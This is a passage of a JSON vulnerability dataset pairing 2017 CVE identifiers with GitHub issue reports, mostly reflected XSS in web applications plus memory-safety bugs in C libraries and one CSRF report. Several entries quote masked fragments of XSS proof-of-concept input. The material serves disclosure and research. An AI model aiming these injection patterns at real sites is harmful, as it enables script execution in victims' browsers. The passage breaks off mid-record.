  13385. "description": "Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in two HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13386. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13387. "severity": "MEDIUM",
  13388. "baseScore": 6.1,
  13389. "impactScore": 2.7,
  13390. "exploitabilityScore": 2.8
  13391. },
  13392. {
  13393. "CVE_ID": "CVE-2017-6540",
  13394. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/830",
  13395. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/830",
  13396. "Repo_new": "wpo-foundation/webpagetest",
  13397. "Issue_Created_At": "2017-03-04T07:51:28Z",
  13398. "description": "Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in the \u201cconfigs\u201d HTTP GET/POST parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG POST: configs= \";} APITAG APITAG alert NUMBERTAG APITAG APITAG function APITAG TO FILETAG",
  13399. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13400. "severity": "MEDIUM",
  13401. "baseScore": 6.1,
  13402. "impactScore": 2.7,
  13403. "exploitabilityScore": 2.8
  13404. },
  13405. {
  13406. "CVE_ID": "CVE-2017-6541",
  13407. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/834",
  13408. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/834",
  13409. "Repo_new": "wpo-foundation/webpagetest",
  13410. "Issue_Created_At": "2017-03-04T07:53:04Z",
  13411. "description": "Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in two HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13412. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13413. "severity": "MEDIUM",
  13414. "baseScore": 6.1,
  13415. "impactScore": 2.7,
  13416. "exploitabilityScore": 2.8
  13417. },
  13418. {
  13419. "CVE_ID": "CVE-2017-6544",
  13420. "Issue_Url_old": "https://github.com/Gargaj/wuhu/issues/20",
  13421. "Issue_Url_new": "https://github.com/gargaj/wuhu/issues/20",
  13422. "Repo_new": "gargaj/wuhu",
  13423. "Issue_Created_At": "2017-03-04T05:32:09Z",
  13424. "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \u201cid\u201d HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13425. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13426. "severity": "MEDIUM",
  13427. "baseScore": 6.1,
  13428. "impactScore": 2.7,
  13429. "exploitabilityScore": 2.8
  13430. },
  13431. {
  13432. "CVE_ID": "CVE-2017-6800",
  13433. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/28",
  13434. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/28",
  13435. "Repo_new": "yeraze/ytnef",
  13436. "Issue_Created_At": "2017-02-15T15:24:13Z",
  13437. "description": "out of bounds read with test data in APITAG When compiling ytnef with address sanitizer enabled (a compiler feature to detect invalid memory access), it shows an out of bounds read in the function APITAG This doesn't require any malformed input, it happens with many of the test files shipped in the dir test data. To reproduce: Compile ytnef NUMBERTAG with address sanitizer: ./autogen.sh; ./configure; make CFLAGS=\" fsanitize=address g\" Run ytnefprint/ytnefprint test APITAG or ytnefprint/ytnefprint test data/winmail.dat Here's the error message from address sanitizer NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG eeb0 at pc NUMBERTAG f NUMBERTAG eb0cc NUMBERTAG a bp NUMBERTAG ffd NUMBERTAG a NUMBERTAG e0 sp NUMBERTAG ffd NUMBERTAG a NUMBERTAG d8 READ of size NUMBERTAG at NUMBERTAG eeb0 thread T NUMBERTAG f NUMBERTAG eb0cc NUMBERTAG in APITAG PATHTAG NUMBERTAG d9bbc in APITAG PATHTAG NUMBERTAG d NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ead NUMBERTAG e0 in __libc_start_main APITAG NUMBERTAG d8d NUMBERTAG in _start ( PATHTAG NUMBERTAG eeb4 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG eb3a NUMBERTAG in calloc ( PATHTAG NUMBERTAG f NUMBERTAG eb0c3f2a in APITAG PATHTAG NUMBERTAG f NUMBERTAG eb0c NUMBERTAG da in APITAG PATHTAG NUMBERTAG f NUMBERTAG eb0cac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG eb0c9ac6 in APITAG PATHTAG NUMBERTAG d NUMBERTAG dc in main PATHTAG NUMBERTAG f NUMBERTAG ead NUMBERTAG e0 in __libc_start_main APITAG",
  13438. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  13439. "severity": "HIGH",
  13440. "baseScore": 7.5,
  13441. "impactScore": 3.6,
  13442. "exploitabilityScore": 3.9
  13443. },
  13444. {
  13445. "CVE_ID": "CVE-2017-6802",
  13446. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/34",
  13447. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/34",
  13448. "Repo_new": "yeraze/ytnef",
  13449. "Issue_Created_At": "2017-02-24T22:46:57Z",
  13450. "description": "out of bounds read in APITAG The attached file causes an out of bounds read detectable with asan in the function APITAG FILETAG Here's the address sanitizer error NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b at pc NUMBERTAG cdc bp NUMBERTAG ffe NUMBERTAG sp NUMBERTAG ffe NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b thread T NUMBERTAG cdb in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG a2cb in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f0b NUMBERTAG c8c1e0 in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG b is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d NUMBERTAG c0 in calloc ( PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG cb NUMBERTAG in APITAG PATHTAG NUMBERTAG f4 in APITAG PATHTAG NUMBERTAG d in main PATHTAG",
  13451. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  13452. "severity": "HIGH",
  13453. "baseScore": 7.5,
  13454. "impactScore": 3.6,
  13455. "exploitabilityScore": 3.9
  13456. },
  13457. {
  13458. "CVE_ID": "CVE-2017-6808",
  13459. "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/18",
  13460. "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/18",
  13461. "Repo_new": "paintballrefjosh/mangoswebv4",
  13462. "Issue_Created_At": "2017-03-08T04:45:15Z",
  13463. "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability in FILETAG . The vulnerability exists due to insufficient filtration of user supplied data in \"id\" HTTP parameter that will be passed to PATHTAG \". The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13464. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13465. "severity": "MEDIUM",
  13466. "baseScore": 6.1,
  13467. "impactScore": 2.7,
  13468. "exploitabilityScore": 2.8
  13469. },
  13470. {
  13471. "CVE_ID": "CVE-2017-6809",
  13472. "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/21",
  13473. "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/21",
  13474. "Repo_new": "paintballrefjosh/mangoswebv4",
  13475. "Issue_Created_At": "2017-03-08T04:51:58Z",
  13476. "description": "A Reflected XSS vulnerability in admin. FILETAG . Hello: I have find a Reflected XSS vulnerability in FILETAG . The vulnerability exists due to insufficient filtration of user supplied data in \"id\" HTTP parameter that will be passed to PATHTAG FILETAG \". The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13477. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13478. "severity": "MEDIUM",
  13479. "baseScore": 6.1,
  13480. "impactScore": 2.7,
  13481. "exploitabilityScore": 2.8
  13482. },
  13483. {
  13484. "CVE_ID": "CVE-2017-6810",
  13485. "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/20",
  13486. "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/20",
  13487. "Repo_new": "paintballrefjosh/mangoswebv4",
  13488. "Issue_Created_At": "2017-03-08T04:48:55Z",
  13489. "description": "I have find a Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability in FILETAG . The vulnerability exists due to insufficient filtration of user supplied data in \"linkid \" HTTP parameter that will be passed to \" PATHTAG FILETAG \". The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13490. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13491. "severity": "MEDIUM",
  13492. "baseScore": 6.1,
  13493. "impactScore": 2.7,
  13494. "exploitabilityScore": 2.8
  13495. },
  13496. {
  13497. "CVE_ID": "CVE-2017-6811",
  13498. "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/19",
  13499. "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/19",
  13500. "Repo_new": "paintballrefjosh/mangoswebv4",
  13501. "Issue_Created_At": "2017-03-08T04:46:51Z",
  13502. "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability in FILETAG . The vulnerability exists due to insufficient filtration of user supplied data in \"id\" HTTP parameter that will be passed to \" PATHTAG \". The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13503. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13504. "severity": "MEDIUM",
  13505. "baseScore": 6.1,
  13506. "impactScore": 2.7,
  13507. "exploitabilityScore": 2.8
  13508. },
  13509. {
  13510. "CVE_ID": "CVE-2017-6812",
  13511. "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/17",
  13512. "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/17",
  13513. "Repo_new": "paintballrefjosh/mangoswebv4",
  13514. "Issue_Created_At": "2017-03-08T04:43:45Z",
  13515. "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability in FILETAG . The vulnerability exists due to insufficient filtration of user supplied data in \"id\" HTTP parameter that will be passed to \" PATHTAG \". The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13516. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13517. "severity": "MEDIUM",
  13518. "baseScore": 6.1,
  13519. "impactScore": 2.7,
  13520. "exploitabilityScore": 2.8
  13521. },
  13522. {
  13523. "CVE_ID": "CVE-2017-6829",
  13524. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/33",
  13525. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/33",
  13526. "Repo_new": "mpruett/audiofile",
  13527. "Issue_Created_At": "2017-02-20T16:37:33Z",
  13528. "description": "global buffer overflow in APITAG APITAG URLTAG",
  13529. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13530. "severity": "MEDIUM",
  13531. "baseScore": 5.5,
  13532. "impactScore": 3.6,
  13533. "exploitabilityScore": 1.8
  13534. },
  13535. {
  13536. "CVE_ID": "CVE-2017-6830",
  13537. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/34",
  13538. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/34",
  13539. "Repo_new": "mpruett/audiofile",
  13540. "Issue_Created_At": "2017-02-20T16:38:01Z",
  13541. "description": "heap based buffer overflow in alaw2linear_buf APITAG URLTAG",
  13542. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13543. "severity": "MEDIUM",
  13544. "baseScore": 5.5,
  13545. "impactScore": 3.6,
  13546. "exploitabilityScore": 1.8
  13547. },
  13548. {
  13549. "CVE_ID": "CVE-2017-6831",
  13550. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/35",
  13551. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/35",
  13552. "Repo_new": "mpruett/audiofile",
  13553. "Issue_Created_At": "2017-02-20T16:38:25Z",
  13554. "description": "heap based buffer overflow in APITAG APITAG URLTAG",
  13555. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13556. "severity": "MEDIUM",
  13557. "baseScore": 5.5,
  13558. "impactScore": 3.6,
  13559. "exploitabilityScore": 1.8
  13560. },
  13561. {
  13562. "CVE_ID": "CVE-2017-6832",
  13563. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/36",
  13564. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/36",
  13565. "Repo_new": "mpruett/audiofile",
  13566. "Issue_Created_At": "2017-02-20T16:38:50Z",
  13567. "description": "heap based buffer overflow in APITAG APITAG URLTAG",
  13568. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13569. "severity": "MEDIUM",
  13570. "baseScore": 5.5,
  13571. "impactScore": 3.6,
  13572. "exploitabilityScore": 1.8
  13573. },
  13574. {
  13575. "CVE_ID": "CVE-2017-6833",
  13576. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/37",
  13577. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/37",
  13578. "Repo_new": "mpruett/audiofile",
  13579. "Issue_Created_At": "2017-02-20T16:39:16Z",
  13580. "description": "divide by zero in APITAG APITAG URLTAG",
  13581. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13582. "severity": "MEDIUM",
  13583. "baseScore": 5.5,
  13584. "impactScore": 3.6,
  13585. "exploitabilityScore": 1.8
  13586. },
  13587. {
  13588. "CVE_ID": "CVE-2017-6834",
  13589. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/38",
  13590. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/38",
  13591. "Repo_new": "mpruett/audiofile",
  13592. "Issue_Created_At": "2017-02-20T16:39:45Z",
  13593. "description": "heap based buffer overflow in ulaw2linear_buf APITAG URLTAG",
  13594. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13595. "severity": "MEDIUM",
  13596. "baseScore": 5.5,
  13597. "impactScore": 3.6,
  13598. "exploitabilityScore": 1.8
  13599. },
  13600. {
  13601. "CVE_ID": "CVE-2017-6835",
  13602. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/39",
  13603. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/39",
  13604. "Repo_new": "mpruett/audiofile",
  13605. "Issue_Created_At": "2017-02-20T16:40:01Z",
  13606. "description": "divide by zero in APITAG APITAG URLTAG",
  13607. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13608. "severity": "MEDIUM",
  13609. "baseScore": 5.5,
  13610. "impactScore": 3.6,
  13611. "exploitabilityScore": 1.8
  13612. },
  13613. {
  13614. "CVE_ID": "CVE-2017-6836",
  13615. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/40",
  13616. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/40",
  13617. "Repo_new": "mpruett/audiofile",
  13618. "Issue_Created_At": "2017-02-20T16:40:17Z",
  13619. "description": "heap based buffer overflow in APITAG APITAG URLTAG",
  13620. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13621. "severity": "MEDIUM",
  13622. "baseScore": 5.5,
  13623. "impactScore": 3.6,
  13624. "exploitabilityScore": 1.8
  13625. },
  13626. {
  13627. "CVE_ID": "CVE-2017-6837",
  13628. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/41",
  13629. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/41",
  13630. "Repo_new": "mpruett/audiofile",
  13631. "Issue_Created_At": "2017-02-20T16:40:30Z",
  13632. "description": "multiple ubsan crashes. URLTAG",
  13633. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13634. "severity": "MEDIUM",
  13635. "baseScore": 5.5,
  13636. "impactScore": 3.6,
  13637. "exploitabilityScore": 1.8
  13638. },
  13639. {
  13640. "CVE_ID": "CVE-2017-6850",
  13641. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/112",
  13642. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/112",
  13643. "Repo_new": "jasper-software/jasper",
  13644. "Issue_Created_At": "2017-01-18T16:18:54Z",
  13645. "description": "NULL pointer dereference in jp2_cdef_destroy (jp2_cod.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
  13646. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13647. "severity": "MEDIUM",
  13648. "baseScore": 5.5,
  13649. "impactScore": 3.6,
  13650. "exploitabilityScore": 1.8
  13651. },
  13652. {
  13653. "CVE_ID": "CVE-2017-6851",
  13654. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/113",
  13655. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/113",
  13656. "Repo_new": "jasper-software/jasper",
  13657. "Issue_Created_At": "2017-01-21T16:36:38Z",
  13658. "description": "invalid memory read in jas_matrix_bindsub (jas_seq.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
  13659. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13660. "severity": "MEDIUM",
  13661. "baseScore": 5.5,
  13662. "impactScore": 3.6,
  13663. "exploitabilityScore": 1.8
  13664. },
  13665. {
  13666. "CVE_ID": "CVE-2017-6852",
  13667. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/114",
  13668. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/114",
  13669. "Repo_new": "jasper-software/jasper",
  13670. "Issue_Created_At": "2017-01-25T08:28:04Z",
  13671. "description": "heap based buffer overflow in jpc_dec_decodepkt (jpc_t2dec.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
  13672. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  13673. "severity": "HIGH",
  13674. "baseScore": 7.8,
  13675. "impactScore": 5.9,
  13676. "exploitabilityScore": 1.8
  13677. },
  13678. {
  13679. "CVE_ID": "CVE-2017-6905",
  13680. "Issue_Url_old": "https://github.com/concrete5/concrete5-legacy/issues/1947",
  13681. "Issue_Url_new": "https://github.com/concretecms/concrete5-legacy/issues/1947",
  13682. "Repo_new": "concretecms/concrete5-legacy",
  13683. "Issue_Created_At": "2017-03-13T17:44:36Z",
  13684. "description": "concrete5 \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: concrete5 Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in \u201cconcrete NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13685. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13686. "severity": "MEDIUM",
  13687. "baseScore": 6.1,
  13688. "impactScore": 2.7,
  13689. "exploitabilityScore": 2.8
  13690. },
  13691. {
  13692. "CVE_ID": "CVE-2017-6906",
  13693. "Issue_Url_old": "https://github.com/Xtraball/SiberianCMS/issues/217",
  13694. "Issue_Url_new": "https://github.com/xtraball/siberian/issues/217",
  13695. "Repo_new": "xtraball/siberian",
  13696. "Issue_Created_At": "2017-03-08T14:22:40Z",
  13697. "description": "APITAG \u2013 Cross Site Scripting (XSS). Product: APITAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201clog\u201d HTTP GET parameter passed to the the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13698. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13699. "severity": "MEDIUM",
  13700. "baseScore": 6.1,
  13701. "impactScore": 2.7,
  13702. "exploitabilityScore": 2.8
  13703. },
  13704. {
  13705. "CVE_ID": "CVE-2017-6907",
  13706. "Issue_Url_old": "https://github.com/Overv/Open.GL/issues/56",
  13707. "Issue_Url_new": "https://github.com/overv/open.gl/issues/56",
  13708. "Repo_new": "overv/open.gl",
  13709. "Issue_Created_At": "2017-03-13T17:48:44Z",
  13710. "description": "Open.GL \u2013 Cross Site Scripting (XSS). Product: Open.GL Download: FILETAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG latest version\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201ccontent\u201d HTTP GET parameter passed to the APITAG APITAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13711. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13712. "severity": "MEDIUM",
  13713. "baseScore": 6.1,
  13714. "impactScore": 2.7,
  13715. "exploitabilityScore": 2.8
  13716. },
  13717. {
  13718. "CVE_ID": "CVE-2017-6908",
  13719. "Issue_Url_old": "https://github.com/concrete5/concrete5-legacy/issues/1948",
  13720. "Issue_Url_new": "https://github.com/concretecms/concrete5-legacy/issues/1948",
  13721. "Repo_new": "concretecms/concrete5-legacy",
  13722. "Issue_Created_At": "2017-03-13T17:45:51Z",
  13723. "description": "concrete5 \u2013 Cross Site Scripting (XSS) in APITAG Product: concrete5 Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in \u201cconcrete NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the APITAG HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13724. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13725. "severity": "MEDIUM",
  13726. "baseScore": 6.1,
  13727. "impactScore": 2.7,
  13728. "exploitabilityScore": 2.8
  13729. },
  13730. {
  13731. "CVE_ID": "CVE-2017-6909",
  13732. "Issue_Url_old": "https://github.com/shish/shimmie2/issues/597",
  13733. "Issue_Url_new": "https://github.com/shish/shimmie2/issues/597",
  13734. "Repo_new": "shish/shimmie2",
  13735. "Issue_Created_At": "2017-03-03T17:19:36Z",
  13736. "description": "Shimmie \u2013 Cross Site Scripting (XSS) . Product: Shimmie Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201clog\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG APITAG",
  13737. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13738. "severity": "MEDIUM",
  13739. "baseScore": 6.1,
  13740. "impactScore": 2.7,
  13741. "exploitabilityScore": 2.8
  13742. },
  13743. {
  13744. "CVE_ID": "CVE-2017-6914",
  13745. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/275",
  13746. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/275",
  13747. "Repo_new": "bigtreecms/bigtree-cms",
  13748. "Issue_Created_At": "2017-03-15T08:07:56Z",
  13749. "description": "Multiple Security Issue of CSRF at Few Parameters. ' Exploit Title : Multiple Security Issue of CSRF at Few Parameters ' Vulnerability Type : Cross Site Request Forgery (CAPEC NUMBERTAG CVETAG ) ' Reporting Date NUMBERTAG Author : MENTIONTAG MENTIONTAG MENTIONTAG ' Vendor Homepage : FILETAG ' Software Link : URLTAG ' Version NUMBERTAG and NUMBERTAG I. Abstract As quoted from the official site of APITAG CMS, APITAG CMS is an open source content management system built on PHP and APITAG It was created by \u2013 and for \u2013 user experience and content strategy experts. APITAG user system is designed for a single webmaster or large distributed teams. Users can be editors or publishers of a single page or the entire site. II. Introduction NUMBERTAG Cross Site Request Forgery (CSRF) Generally, CSRF is an attack that \u201cforces\u201d a user to do something that is basically \u201cunwanted\u201d in a web based application by utilizing the circumstance of the victim that is being authorized (login). In general, this kind of attack 